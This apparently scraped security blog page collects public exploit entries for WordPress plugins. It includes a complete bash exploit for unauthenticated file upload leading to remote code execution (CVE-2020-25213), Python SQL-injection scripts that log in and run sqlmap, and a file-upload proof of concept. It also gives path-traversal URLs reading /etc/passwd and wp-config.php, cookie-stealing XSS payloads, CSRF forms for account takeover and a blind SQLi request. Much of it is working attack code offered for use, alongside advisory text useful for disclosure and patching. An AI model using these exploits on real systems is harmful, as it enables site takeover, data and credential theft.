source: https://www.securityfocus.com/bid/54058/info
Wp-ImageZoom for WordPress is prone to a remote file-disclosure vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to view local files in the context of the web server process, which may aid in further attacks.
Wp-ImageZoom 1.0.3 is vulnerable; other versions may also be affected.
http://www.example.com/wordpress/wp-content/plugins/wp-imagezoom/download.php?file=../../../../../../../etc/passwd
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863128879
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: WordPress Plugin Wp-FileManager 6.8 - RCE
# Date: September 4,2020
# Exploit Author: Mansoor R (@time4ster)
# CVE: CVE-2020-25213
# Version Affected: 6.0 to 6.8
# Vendor URL: https://wordpress.org/plugins/wp-file-manager/
# Patch: Upgrade to wp-file-manager 6.9 (or above)
# Tested on: wp-file-manager 6.0 (https://downloads.wordpress.org/plugin/wp-file-manager.6.0.zip) on Ubuntu 18.04
#!/bin/bash
#Description:
#The core of the issue began with the File Manager plugin renaming the extension on the elFinder library’s connector.minimal.php.dist file to .php so it could be executed directly, even though the connector file was not used by the File Manager itself. Such libraries often include example files that are not intended to be used “as-is” without adding access controls, and this file had no direct access restrictions, meaning the file could be accessed by anyone. This file could be used to initiate an elFinder command and was hooked to the elFinderConnector.class.php file
#Using connector.minimal.php file attacker can upload arbitrary file to the target (unauthenticated) & thus can achieve Remote code Execution.
#Patch commit details:
# https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=2373068%40wp-file-manager%2Ftrunk&old=2372895%40wp-file-manager%2Ftrunk&sfp_email=&sfph_mail=
#Reference
#https://nvd.nist.gov/vuln/detail/CVE-2020-25213
#Credits:
#1. https://www.wordfence.com/blog/2020/09/700000-wordpress-users-affected-by-zero-day-vulnerability-in-file-manager-plugin/
#2. https://seravo.com/blog/0-day-vulnerability-in-wp-file-manager/
##WARNINGS:
#Only test the exploit on websites you are authorized to.
#Don't upload reverse shell payloads or any files that can cause harm to organization.
#Also note that the uploaded files can be accessed by anyone unless secured by password.
## Usage:
# ========
# root@Hackintosh:~# ./wp-file-manager-exploit.sh -u http://192.168.1.54/wordpress --check
#
# ============================================================================================
# wp-file-manager unauthenticated arbitrary file upload (RCE) Exploit [CVE-2020-25213]
#
# By: Mansoor R (@time4ster)
# ============================================================================================
#
# [+] Found wp-file-manager version: 6.0
# [+] Version appears to be vulnerable
# [+] Target: http://192.168.1.54/wordpress is vulnerable
#
# root@Hackintosh:~# ./wp-file-manager-exploit.sh -u http://192.168.1.54/wordpress -f /tmp/mypoc.php --verbose
#
# ============================================================================================
# wp-file-manager unauthenticated arbitrary file upload (RCE) Exploit [CVE-2020-25213]
#
# By: Mansoor R (@time4ster)
# ============================================================================================
#
# curl POC :
# curl -ks --max-time 5 --user-agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36" -F "reqid=17457a1fe6959" -F "cmd=upload" -F "target=l1_Lw" -F "mtime[]=1576045135" -F "upload[]=@//tmp/mypoc.php" "http://192.168.1.54/wordpress/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"
#
# [+] W00t! W00t! File uploaded successfully.
# Location: /wordpress/wp-content/plugins/wp-file-manager/lib/php/../files/mypoc.php
# Exploit
#==========
echo
echo "============================================================================================"
echo "wp-file-manager unauthenticated arbitrary file upload (RCE) Exploit [CVE-2020-25213]"
echo
echo "By: Mansoor R (@time4ster)"
echo "============================================================================================"
echo
function printHelp()
{
echo -e "
Usage:
-u|--wp_url <string> Wordpress target url
-f|--upload_file <string> Absolute location of local file to upload on the target. (relative path will not work)
-k|--check Only checks whether the vulnerable endpoint exists & have particular fingerprint or not. No file is uploaded.
-v|--verbose Also prints curl command which is going to be executed
-h|--help Print Help menu
Example:
./wp-file-manager-exploit.sh --wp_url https://www.example.com/wordpress --check
./wp-file-manager-exploit.sh --wp_url https://wordpress.example.com/ -f /tmp/php_hello.php --verbose
"
}
check="false"
verbose="false"
#Processing arguments
while [[ "$#" -gt 0 ]]
do
key="$1"
case "$key" in
-u|--wp_url)
wp_url="$2"
shift
shift # past argument
;;
-f|--upload_file)
upload_file="$2"
shift
shift
;;
-k|--check)
check="true"
shift
shift
;;
-v|--verbose)
verbose="true"
shift
;;
-h|--help)
printHelp
exit
shift
;;
*)
echo [-] Enter valid options
exit
;;
esac
done
[[ -z "$wp_url" ]] && echo "[-] Supply wordpress target URL." && exit
[[ -z "$upload_file" ]] && [[ "$check" == "false" ]] && echo "[-] Either supply --upload_file or --check" && exit
[[ -n "$upload_file" ]] && [[ ! -s "$upload_file" ]] && echo "[-] File supplied is either empty or not exist." && exit
#Script have dependency on jq
jq_cmd=$(command -v jq)
[[ -z "$jq_cmd" ]] && echo -e "[-] Script have dependency on jq. Insall jq from your package manager.\nFor debian based distro install using command: apt install jq" && exit
function checkWPFileManagerVersion()
{ #Takes 1 argument: url
declare url="$1"
declare target_endpoint="$url/wp-content/plugins/wp-file-manager/readme.txt"
declare user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36"
declare is_vulnerable="true"
#declare response=$(curl -ks --max-time 5 --user-agent "$user_agent" "$target_endpoint" | grep -i "Stable tag: ")
declare version=$( curl -ks --max-time 5 --user-agent "$user_agent" "$target_endpoint" | grep -A 5 "== Changelog ==" | grep -E -o "[0-9]\.[0-9]" | head -n 1 )
if [ -n "$version" ];then
#declare version=$(echo "$response" | awk {'print $3'})
echo "[+] Found wp-file-manager version: $version"
patched_version="6.9"
#if [ $(awk 'BEGIN {print ('$version' > '6.9'}') ]; then
smaller_version=$(echo -e "$version\n$patched_version" | sort -n | head -n 1)
if [ "$version" != "$patched_version" ] && [ "$smaller_version" == "$version" ];then
echo "[+] Version appears to be vulnerable"
else
echo "[-] Version don't appears to be vulnerable"
is_vulnerable=false
fi
else echo "[-] Unable to detect version. May be wp-file-manager plugin not installed."
is_vulnerable=false
fi
if [ "$is_vulnerable" == "false" ];
then
echo -n "Do you still want to continue (y/N) : "
read choice
[[ "$choice" == "y" ]] || [[ "$choice" == "Y" ]] && echo && return
exit
fi
}
function checkWPFileManager()
{ #Takes 1 argument: url
declare url="$1"
#Checking wp-file-manager plugin version:
checkWPFileManagerVersion "$url"
declare target_endpoint="$url/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"
declare user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36"
declare response=$(curl -ks --max-time 5 --user-agent "$user_agent" "$target_endpoint")
#echo "$response"
#{"error":["errUnknownCmd"]} is returned when vulnerable endpoint is hit
declare is_vulnerable=$(echo "$response" | grep "\{\"error\":\[\"errUnknownCmd\"\]\}")
[[ -n "$is_vulnerable" ]] && echo "[+] Target: $url is vulnerable"
[[ -z "$is_vulnerable" ]] && echo "[-] Target: $url is not vulnerable"
}
function exploitWPFileManager()
{ #Takes 3 arguments: url & file_upload & verbose(true/false)
declare url="$1"
declare file_upload="$2"
declare verbose="$3"
declare target_endpoint="$url/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"
declare user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36"
if [ "$verbose" == "true" ];then
echo "curl POC :"
echo "curl -ks --max-time 5 --user-agent \"$user_agent\" -F \"reqid=17457a1fe6959\" -F \"cmd=upload\" -F \"target=l1_Lw\" -F \"mtime[]=1576045135\" -F \"upload[]=@/$file_upload\" \"$target_endpoint\" "
echo
fi
response=$(curl -ks --max-time 5 --user-agent "$user_agent" -F "reqid=17457a1fe6959" -F "cmd=upload" -F "target=l1_Lw" -F "mtime[]=1576045135" \
-F "upload[]=@/$file_upload" \
"$target_endpoint" )
#echo "$response"
file_upload_url=$(echo "$response" | jq -r .added[0].url 2>/dev/null)
[[ -n "$file_upload_url" ]] && echo -e "[+] W00t! W00t! File uploaded successfully.\nLocation: $file_upload_url "
[[ -z "$file_upload_url" ]] && echo "[-] File upload failed."
}
[[ "$check" == "true" ]] && checkWPFileManager "$wp_url"
[[ -s "$upload_file" ]] && exploitWPFileManager "$wp_url" "$upload_file" "$verbose"
echo
source: https://www.securityfocus.com/bid/59886/info
The wp-FileManager plugin for WordPress is prone to a vulnerability that lets attackers download arbitrary files because the application fails to sufficiently sanitize user-supplied input.
An attacker can exploit this issue to download arbitrary files within the context of the web server process. Information obtained may aid in further attacks.
http://www.example.com/wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download
source: https://www.securityfocus.com/bid/53497/info
WP-FaceThumb is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
WP-FaceThumb 0.1 is vulnerable; other versions may also be affected.
http://www.example.com/?page_id=1&pagination_wp_facethumb=1"><img/src=x onerror=alert(document.cookie)>
#####################################################################################
Application: WP-Client
Version: 3.8.7
Author: Pier-Luc Maltais from COSIG
Twitter: @COSIG_
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
===============
1) Introduction
===============
One plugin configures multiple areas of your WordPress installation and allows the
site Administrator to easily create new Client Areas, Client Management Portals,
Client Estimates & Invoices, Client File Upload Areas, or Private Staff Pages on the
site by entering just a few data fields. Additionally, clients can upload/download
secure files. (https://wp-client.com/)
============================
2) Report Timeline
============================
12/11/2015 - Found the vulnerability
12/11/2015 - Ticket opened
20/11/2015 - Plugin extension Estimates/Invoices updated (v1.5.2)
24/11/2015 - Public disclosure
============================
3) Technical details
============================
WP-Client is vulnerable to a stored XSS attack in the Request Estimate page. The
extension affected is Estimates/Invoices v1.5.1.
============================
4) POC
============================
Request :
POST /portal/request-estimate/ HTTP/1.1
[...]
wpc_data%5Baction%5D=request&wpc_data%5Btitle%5D=Request+Estimate+from+2015-11-12&wpc_data%5Bitems%5D%5B%7Bnum_items%7D%5D%5Bname%5D=&wpc_data%5Bitems%5D%5B%7Bnum_items%7D%5D%5Bdescription%5D=&wpc_data%5Bitems%5D%5B%7Bnum_items%7D%5D%5Bquantity%5D=1&wpc_data%5Bitems%5D%5B%7Bnum_items%7D%5D%5Bprice%5D=&wpc_data%5Bwpc_inv_message%5D=%3Cscript%3Ealert%281%29%3C%2Fscript%3E
Response :
[...]
<div class="wpc_clear"></div>
<span>Comments:</span><br>
<table id="wpc_inv_table_request_notes" style="width: 100%;">
<tr bgcolor="E0E0E0">
<td><b>client:</b></td>
<td><script>alert(1)</script>
[...]
#####################################################################################
# Exploit Title: WordPress Plugin WP with Spritz 1.0 - Remote File Inclusion
# Date: 2018-04-25
# Exploit Author: Wadeek
# Software Link: https://downloads.wordpress.org/plugin/wp-with-spritz.zip
# Software Version: 1.0
# Google Dork: intitle:("Spritz Login Success") AND inurl:("wp-with-spritz/wp.spritz.login.success.html")
# Tested on: Apache2 with PHP 7 on Linux
# Category: webapps
1. Version Disclosure
/wp-content/plugins/wp-with-spritz/readme.txt
2. Source Code
if(isset($_GET['url'])){
$content=file_get_contents($_GET['url']);
3. Proof of Concept
/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd
/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=http(s)://domain/exec
# Exploit Title: WordPress Plugin WP Visitor Statistics 4.7 - SQL Injection
# Date 22/12/2021
# Exploit Author: Ron Jost (Hacker5preme)
# Vendor Homepage: https://www.plugins-market.com/
# Software Link: https://downloads.wordpress.org/plugin/wp-stats-manager.4.7.zip
# Version: <= 4.7
# Tested on: Ubuntu 18.04
# CVE: CVE-2021-24750
# CWE: CWE-89
# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24750/README.md
'''
Description:
The plugin does not properly sanitise and escape the refUrl in the refDetails AJAX action,
available to any authenticated user, which could allow users with a role as low as
subscriber to perform SQL injection attacks
'''
# Banner:
banner = '''
___ _ _ ____ ___ ___ ___ __ ___ __ ___ ___ ___
/ __)( \/ )( ___)___(__ \ / _ \(__ \ / )___(__ \ /. |(__ )| __) / _ \
( (__ \ / )__)(___)/ _/( (_) )/ _/ )((___)/ _/(_ _)/ / |__ \( (_) )
\___) \/ (____) (____)\___/(____)(__) (____) (_)(_/ (___/ \___/
[+] WP Visitor Statistics SQL Injection
[@] Developed by Ron Jost (Hacker5preme)
'''
print(banner)
import argparse
import requests
from datetime import datetime
# User-Input:
my_parser = argparse.ArgumentParser(description='Wordpress Plugin WP Visitor Statistics - SQL Injection')
my_parser.add_argument('-T', '--IP', type=str)
my_parser.add_argument('-P', '--PORT', type=str)
my_parser.add_argument('-U', '--PATH', type=str)
my_parser.add_argument('-u', '--USERNAME', type=str)
my_parser.add_argument('-p', '--PASSWORD', type=str)
my_parser.add_argument('-C', '--COMMAND', type=str)
args = my_parser.parse_args()
target_ip = args.IP
target_port = args.PORT
wp_path = args.PATH
username = args.USERNAME
password = args.PASSWORD
command = args.COMMAND
print('')
print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S')))
print('')
# Authentication:
session = requests.Session()
auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php'
check = session.get(auth_url)
# Header:
header = {
'Host': target_ip,
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'application/x-www-form-urlencoded',
'Origin': 'http://' + target_ip,
'Connection': 'close',
'Upgrade-Insecure-Requests': '1'
}
# Body:
body = {
'log': username,
'pwd': password,
'wp-submit': 'Log In',
'testcookie': '1'
}
auth = session.post(auth_url, headers=header, data=body)
# Exploit:
exploit_url = 'http://' + target_ip + ':' + target_port + '/wordpress/wp-admin/admin-ajax.php?action=refDetails&requests={"refUrl":"' + "' " + command + '"}'
exploit = session.get(exploit_url)
print(exploit.text)
print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))
# Exploit Title: Wordpress Plugin WP Video Playlist 1.1.1 - Stored Cross-Site Scripting (XSS)
# Date: 12 April 2024
# Exploit Author: Erdemstar
# Vendor: https://wordpress.com/
# Version: 1.1.1
# Proof Of Concept:
1. Click Add Video part and enter the XSS payload as below into the first input of form or Request body named "videoFields[post_type]".
# PoC Video: https://www.youtube.com/watch?v=05dM91FiG9w
# Vulnerable Property at Request: videoFields[post_type]
# Payload: <script>alert(document.cookie)</script>
# Request:
POST /wp-admin/options.php HTTP/2
Host: erdemstar.local
Cookie: thc_time=1713843219; booking_package_accountKey=2; wordpress_sec_dd86dc85a236e19160e96f4ec4b56b38=admin%7C1714079650%7CIdP5sIMFkCzSNzY8WFwU5GZFQVLOYP1JZXK77xpoW5R%7C27abdae5aa28462227b32b474b90f0e01fa4751d5c543b281c2348b60f078d2f; wp-settings-time-4=1711124335; cld_2=like; _hjSessionUser_3568329=eyJpZCI6ImY4MWE3NjljLWViN2MtNWM5MS05MzEyLTQ4MGRlZTc4Njc5OSIsImNyZWF0ZWQiOjE3MTEzOTM1MjQ2NDYsImV4aXN0aW5nIjp0cnVlfQ==; wp-settings-time-1=1712096748; wp-settings-1=mfold%3Do%26libraryContent%3Dbrowse%26uploader%3D1%26Categories_tab%3Dpop%26urlbutton%3Dfile%26editor%3Dtinymce%26unfold%3D1; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_dd86dc85a236e19160e96f4ec4b56b38=admin%7C1714079650%7CIdP5sIMFkCzSNzY8WFwU5GZFQVLOYP1JZXK77xpoW5R%7Cc64c696fd4114dba180dc6974e102cc02dc9ab8d37482e5c4e86c8e84a1f74f9
Content-Length: 395
Cache-Control: max-age=0
Sec-Ch-Ua: "Not(A:Brand";v="24", "Chromium";v="122"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Upgrade-Insecure-Requests: 1
Origin: https://erdemstar.local
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://erdemstar.local/wp-admin/admin.php?page=video_manager
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=0, i
option_page=mediaManagerCPT&action=update&_wpnonce=29af746404&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dvideo_manager%26settings-updated%3Dtrue&videoFields%5BmeidaId%5D=1&videoFields%5Bpost_type%5D=<script>alert(document.cookie)</script>&videoFields%5BmediaUri%5D=dummy&videoFields%5BoptionName%5D=videoFields&videoFields%5BoptionType%5D=add&submit=Save+Changes
# Exploit Title: WP Vault 0.8.6.6 – Plugin WordPress – Local File Inclusion
# Date: 28/11/2016
# Exploit Author: Lenon Leite
# Vendor Homepage: https://wordpress.org/plugins/wp-vault/
# Software Link: https://wordpress.org/plugins/wp-vault/
# Contact: http://twitter.com/lenonleite
# Website: http://lenonleite.com.br/
# Category: webapps
# Version: 0.8.6.6
# Tested on: Ubuntu 14.04
1 - Description:
$_GET[“wpv-image”] is not escaped in include file.
http://lenonleite.com.br/en/blog/2016/11/30/wp-vault-0-8-6-6-local-file-inclusion/
2 - Proof of Concept:
http://Target/?wpv-image=[LFI]
http://Target/?wpv-image=../../../../../../../../../../etc/passwd
3 - Timeline:
12/11/2016 - Discovered
12/11/2016 - vendor not found
# Exploit Title: WordPress Plugin WP User Frontend 3.5.25 - SQLi (Authenticated)
# Date 20.02.2022
# Exploit Author: Ron Jost (Hacker5preme)
# Vendor Homepage: https://wedevs.com/
# Software Link: https://downloads.wordpress.org/plugin/wp-user-frontend.3.5.25.zip
# Version: < 3.5.25
# Tested on: Ubuntu 20.04
# CVE: CVE-2021-25076
# CWE: CWE-89
# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-25076/README.md
'''
Description:
The WP User Frontend WordPress plugin before 3.5.26 does not validate and escape the status parameter
before using it in a SQL statement in the Subscribers dashboard, leading to an SQL injection.
Due to the lack of sanitisation and escaping, this could also lead to Reflected Cross-Site Scripting
'''
banner = '''
_|_|_| _| _| _|_|_|_| _|_| _| _|_| _| _|_| _|_|_|_| _| _|_|_|_|_| _|_|_|
_| _| _| _| _| _| _| _| _| _| _|_| _| _| _| _| _| _| _|
_| _| _| _|_|_| _|_|_|_|_| _| _| _| _| _| _|_|_|_|_| _| _|_|_| _| _| _| _|_|_|
_| _| _| _| _| _| _| _| _| _| _| _| _| _| _| _|
_|_|_| _| _|_|_|_| _|_|_|_| _| _|_|_|_| _| _|_|_|_| _|_|_| _| _| _|_|
[+] WP User Frontend - SQL Injection
[@] Developed by Ron Jost (Hacker5preme)
'''
print(banner)
import argparse
from datetime import datetime
import os
import requests
import json
# User-Input:
my_parser = argparse.ArgumentParser(description= 'WP User Frontend - SQL-Injection (Authenticated)')
my_parser.add_argument('-T', '--IP', type=str)
my_parser.add_argument('-P', '--PORT', type=str)
my_parser.add_argument('-U', '--PATH', type=str)
my_parser.add_argument('-u', '--USERNAME', type=str)
my_parser.add_argument('-p', '--PASSWORD', type=str)
args = my_parser.parse_args()
target_ip = args.IP
target_port = args.PORT
wp_path = args.PATH
username = args.USERNAME
password = args.PASSWORD
print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S')))
# Authentication:
session = requests.Session()
auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php'
check = session.get(auth_url)
# Header:
header = {
'Host': target_ip,
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'application/x-www-form-urlencoded',
'Origin': 'http://' + target_ip,
'Connection': 'close',
'Upgrade-Insecure-Requests': '1'
}
# Body:
body = {
'log': username,
'pwd': password,
'wp-submit': 'Log In',
'testcookie': '1'
}
auth = session.post(auth_url, headers=header, data=body)
# SQL-Injection (Exploit):
# Generate payload for sqlmap
cookies_session = session.cookies.get_dict()
cookie = json.dumps(cookies_session)
cookie = cookie.replace('"}','')
cookie = cookie.replace('{"', '')
cookie = cookie.replace('"', '')
cookie = cookie.replace(" ", '')
cookie = cookie.replace(":", '=')
cookie = cookie.replace(',', '; ')
print('[*] Payload for SQL-Injection:')
exploitcode_url = r'sqlmap -u "http://' + target_ip + ':' + target_port + wp_path + r'wp-admin/admin.php?page=wpuf_subscribers&post_ID=1&status=1" '
exploitcode_risk = '--level 2 --risk 2 '
exploitcode_cookie = '--cookie="' + cookie + '" '
print(' Sqlmap options:')
print(' -a, --all Retrieve everything')
print(' -b, --banner Retrieve DBMS banner')
print(' --current-user Retrieve DBMS current user')
print(' --current-db Retrieve DBMS current database')
print(' --passwords Enumerate DBMS users password hashes')
print(' --tables Enumerate DBMS database tables')
print(' --columns Enumerate DBMS database table column')
print(' --schema Enumerate DBMS schema')
print(' --dump Dump DBMS database table entries')
print(' --dump-all Dump all DBMS databases tables entries')
retrieve_mode = input('Which sqlmap option should be used to retrieve your information? ')
exploitcode = exploitcode_url + exploitcode_risk + exploitcode_cookie + retrieve_mode + ' -p status -v 0 --answers="follow=Y" --batch'
os.system(exploitcode)
print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))
'''
* Exploit Title: WordPress WP User Frontend Plugin [Unrestricted File Upload]
* Discovery Date: 2016-02-04
* Public Disclosure: 2016-02-08
* Exploit Author: Panagiotis Vagenas
* Contact: https://twitter.com/panVagenas
* Vendor Homepage: https://wedevs.com
* Software Link: https://wordpress.org/plugins/wp-user-frontend
* Version: < 2.3.11
* Tested on: WordPress 4.4.2
* Category: WebApps, WordPress
Description
-----------
WordPress plugin _WP User Frontend_ suffers from an unrestricted file uploade vulnerability. An attacker can exploit the `wpuf_file_upload` or `wpuf_insert_image` actions to upload any file which pass the WordPress mime and size checks.
The attack does not require any privilege to be performed. The mentioned actions are available to non-privileged users also, thus allowing to anyone uploading files to the web server.
PoC
---
'''
#!/usr/bin/python3
################################################################################
# WP User Frontend unrestricted file upload exploit
#
# Author: Panagiotis Vagenas <pan.vagenas@gmail.com>
################################################################################
import requests
import tempfile
url = 'http://example.com/wp-admin/admin-ajax.php'
postData = {
'action': 'wpuf_file_upload'
}
file = tempfile.NamedTemporaryFile(mode='a+t', suffix='.jpeg')
file.write('A'*32)
file.seek(0)
files = {'wpuf_file': file}
r = requests.post(url, data=postData, files=files)
file.close()
if r.text != 'error':
print('Success!')
print(r.text)
else:
print('error')
exit(0)
'''
Timeline
--------
1. **2016-02-04**: Vendor notified via support forums in WordPress.org
2. **2016-02-05**: Vendor responded
3. **2016-02-05**: Issue details send to vendor
4. **2016-02-06**: Requested CVE ID
5. **2016-02-06**: Vendor implemented security checks
6. **2016-02-06**: Verified that this exploit is no longer valid
7. **2016-02-08**: Vendor released v2.3.11 which resolves this issue
'''
source: https://www.securityfocus.com/bid/69741/info
WP to Twitter Plugin for WordPress is prone to an authorization-bypass vulnerability.
An attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions; this may aid in launching further attacks.
WP to Twitter 2.9.3 is vulnerable; other versions may also be affected.
<html><body>
<form method="post" action="http://www.example.com/wordpress/wp-admin/admin-ajax.php">
action:<input name="action" value="wpt_tweet"><br>
tweet action:<input name="tweet_action" value="tweet"><br>
tweet text: <input value="" name="tweet_text"><br>
tweet schedule: <input value="undefined+undefined" name="tweet_schedule"><br>
tweet post id: <input value="1" name="tweet_post_id"><br>
<input type="submit" value="Submit">
</form>
</body></html>
#Product : WP Symposium Pro Social Network plugin
#Exploit Author : Rahul Pratap Singh
#Home page Link : https://wordpress.org/plugins/wp-symposium-pro
#Version : 15.12
#Website : 0x62626262.wordpress.com
#Twitter : @0x62626262
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
#Date : 8/Jan/2016
1) XSS Vulnerability:
Vulnerable Code:
file: wps_usermeta_shortcodes.php
"wpspro_country" parameter is not sanitized, that leads to persistent xss.
Video Demonstration:
https://www.youtube.com/watch?v=Xglc3rNZPXs
2) CSRF Vulnerability:
Description:
Edit profile page is vulnerable to CSRF, that allows to change password
which in turn leads to full account takeover.
Exploit:
<html>
<body>
<form action="http://localhost/wp422/wordpress/index.php/edit-profile/"
method="POST" enctype="multipart/form-data">
<input type="hidden" name="wps_usermeta_change_update"
value="yes" />
<input type="hidden" name="wpspro_display_name" value="rahul"
/>
<input type="hidden" name="wpspro_firstname" value="hello1" />
<input type="hidden" name="wpspro_lastname" value="hello2" />
<input type="hidden" name="wpspro_email" value=" " />
<input type="hidden" name="wpsro_home" value="hello4" />
<input type="hidden" name="wpspro_country" value="hello5" />
<input type="hidden" name="wpspro_password" value="asdf" />
<input type="hidden" name="wpspro_password2" value="asdf" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Video Demonstration:
https://www.youtube.com/watch?v=sN65HlCRe9c
Fix:
Update to version 16.1
Disclosure Timeline:
reported to vendor : 6/1/2016
vendor response : 6/1/2016
vendor acknowledged : 6/1/2016
vendor scheduled a patch: 7/1/2016
CVE Number : Not assigned yet
# Exploit Title: WordPress Plugin WP Symposium Pro 2021.10 - 'wps_admin_forum_add_name' Stored Cross-Site Scripting (XSS)
# Date: 11/11/2021
# Exploit Author: Murat DEMIRCI (@butterflyhunt3r)
# Vendor Homepage: http://www.wpsymposiumpro.com/
# Software Link: https://wordpress.org/plugins/wp-symposium-pro/
# Version: 2021.10
# Tested on : Windows 10
#Description: WP Symposium Pro version 2021.10 plugin was exposed to stored cross site scripting vulnerability due to lack of sanitizing adding forum speciality and its "name" label.
#Poc:
POST /wordpress/wp-admin/admin.php?page=wps_pro_setup HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wordpress/wp-admin/admin.php?page=wps_pro_setup
Content-Type: application/x-www-form-urlencoded
Content-Length: 129
Origin: http://localhost
Connection: close
Cookie: wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1636828443%7CvIYW2N7MvOinijMOx1nLkLNysDvFz33pkuJcGyuQq56%7Ca0ec8384ede32940d2b69f1082cc013aecf3e887a70485cb38229a405be8a12d; wordpress_test_cookie=WP%20Cookie%20check; wp-settings-1=libraryContent%3Dbrowse%26mfold%3Do%26posts_list_mode%3Dlist; wp-settings-time-1=1636654062; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1636828443%7CvIYW2N7MvOinijMOx1nLkLNysDvFz33pkuJcGyuQq56%7Cd9daf69cf25e68a3ed54d94c4baa78d20f9772e986211e25656dd832aac6e544
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
wpspro_quick_start=forum&wps_admin_forum_add_name=%3Cimg+src%3Dx+onerror%3Dconfirm%281%29%3E&wps_admin_forum_add_description=test
----------------------------------------------------------------------------------
## After adding new forum, click created forum and pop-up will be on the screen.
Details
================
Software: WP Symposium
Version: 15.1
Homepage: https://wordpress.org/plugins/wp-symposium
Advisory report: https://security.dxw.com/advisories/blind-sql-injection-in-wp-symposium-allows-unauthenticated-attackers-to-access-sensitive-data/
CVE: Awaiting assignment
CVSS: 6.4 (Medium; AV:N/AC:L/Au:N/C:P/I:N/A:P)
Description
================
Blind SQL Injection in WP Symposium allows unauthenticated attackers to access sensitive data
Vulnerability
================
An unauthenticated user can run blind sql injection of the site and extract password hashes and other information from the database.
Proof of concept
================
Perform the following POST to a site with the plugin installed. The request will take over 5 seconds to respond:
POST /wordpress/wp-content/plugins/wp-symposium/ajax/forum_functions.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://127.0.0.1/wordpress/
Content-Length: 51
Cookie: wp-settings-1=libraryContent%3Dbrowse%26editor%3Dtinymce; wp-settings-time-1=1421717320
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
action=getTopic&topic_id=1 AND SLEEP(5)&group_id=0
Mitigations
================
